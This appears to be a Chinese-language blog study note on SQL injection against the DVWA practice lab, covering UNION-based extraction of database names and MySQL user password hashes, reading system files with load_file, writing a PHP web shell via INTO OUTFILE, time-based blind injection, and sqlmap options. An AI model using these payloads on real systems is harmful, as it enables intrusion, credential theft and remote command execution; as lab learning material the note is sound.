文章目录
  1. 1. DVWA笔记
    1. 1.1. 0x1 Low Injection
      1. 1.1.1. 0x00 order by x desc
      2. 1.1.2. 0x01 union select 1,2,3 –
      3. 1.1.3. 0x02 获取库名
      4. 1.1.4. 0x03 获取版本信息 数据库
      5. 1.1.5. 0x04 显示当前的用户名和密码
      6. 1.1.6. 0x05 读取系统文件
      7. 1.1.7. 0x06 注入点直接写入shell
    2. 1.2. 0x1 Low Blind Injection
      1. 1.2.1. 0x01 判断是否存在注入点
      2. 1.2.2. 0x02 后面
      3. 1.2.3. 0x03 Medium & High
      4. 1.2.4. SQLMAP基本用法:
    3. 1.3. 小技巧
    4. 1.4. Reference

DVWA笔记

0x1 Low Injection

0x00 order by x desc

判断是否存在注入
可以判断字段

0x01 union select 1,2,3 –

用来判断在web显示的字段长度,长度不匹配就会返回错误
如果知道字段和表

1
1'union select 1,(select password from user where user_id =1)--     '

0x02 获取库名

一旦可以进行union操作,即可利用information_schema.schemata
union虽然限制了显示内容,但是我们可以利用concat_ws()进行字符串连接增加显示

1
2
  1'union select 1,(concat_ws(char(32,58,32),user(),database(),version()))--            
'

concat_ws(‘ ‘, ‘a’,’b’) 字符串连接函数,用空格连接a和b
char(32,58,32) unicode转字符
user() 返回当前用户
database() 当前数据库
version() Mysql版本

0x03 获取版本信息 数据库

1
2
1'union select 1,schema_name from information_schema.schemata-- 
'

information_schema.schemata 这个表显示的是所有的表名

0x04 显示当前的用户名和密码

concat(user, ‘:’ , password); //和concat_ws()有所不一样,直接连接
1’union select 1,(concat(user,’:’,password)) from mysql.user–
//读取mysql数据库中user表的user和password字段内容

0x05 读取系统文件

load_file(‘../../xx.txt’); 文件目录不能无限../
load_file(‘E:/xampp/xx.text’); //可以直接用这个方法

0x06 注入点直接写入shell

1
2
3
1'union select 1,     "<?php
system($_GET('hexo')); //hexo作为一个变量
?>" into outfile '../../shell.php'--

0x1 Low Blind Injection

0x01 判断是否存在注入点

1
2
1' and sleep(4)-- 
'

如果存在注入点,网页会在4秒之后才会有反应

0x02 后面

和普通的一样,把最后一个换成sleep(5)
sleep()如果sleep无效试试benchmark()[MySQL5.0以下]//这个没试过,以后直接查询手册即可

其他的也都差不多

0x03 Medium & High

Medium: @直接关闭了错误回显
//这个的话盲注依然可以,但是需要耐心了
High: 检测是否被攻击,然后0-5秒内自动sleep()
//也需要时间把,更多而已,设成10秒就可以很明显了,结合F12的network看一下就行了

SQLMAP基本用法:

定了注入的URL
-p 参数指定了注入的参数,这里指定了id,也就是通过URL中的id参数注入,遇到多参数的URL时候这个-p就十分有用了。
–current-db,让SQLMAP列举出当前的数据库名称
-v 这个参数这里并没有使用到,这个参数会改变输出log的详细程度,一般默认即可,如果是学习或是想查看sqlmap使用的payload,可以使用-v 3参数。
–level 这个很有bi用咯,我个人理解是提高检测的等级,也就是说level 3会比level 1使用更多的payload进行测试。

小技巧

id = -1 也可以实现报错,在没有引号的情况跟之下23w32217uy7yuhjnm 65ythggb

Reference

Web漏洞实战教程 DVWA的使用和漏洞分析

文章目录
  1. 1. DVWA笔记
    1. 1.1. 0x1 Low Injection
      1. 1.1.1. 0x00 order by x desc
      2. 1.1.2. 0x01 union select 1,2,3 –
      3. 1.1.3. 0x02 获取库名
      4. 1.1.4. 0x03 获取版本信息 数据库
      5. 1.1.5. 0x04 显示当前的用户名和密码
      6. 1.1.6. 0x05 读取系统文件
      7. 1.1.7. 0x06 注入点直接写入shell
    2. 1.2. 0x1 Low Blind Injection
      1. 1.2.1. 0x01 判断是否存在注入点
      2. 1.2.2. 0x02 后面
      3. 1.2.3. 0x03 Medium & High
      4. 1.2.4. SQLMAP基本用法:
    3. 1.3. 小技巧
    4. 1.4. Reference